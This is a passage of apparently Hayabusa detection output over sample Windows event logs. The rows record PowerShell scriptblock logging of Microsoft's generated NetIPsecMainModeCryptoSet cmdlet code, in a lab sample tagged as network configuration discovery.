$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 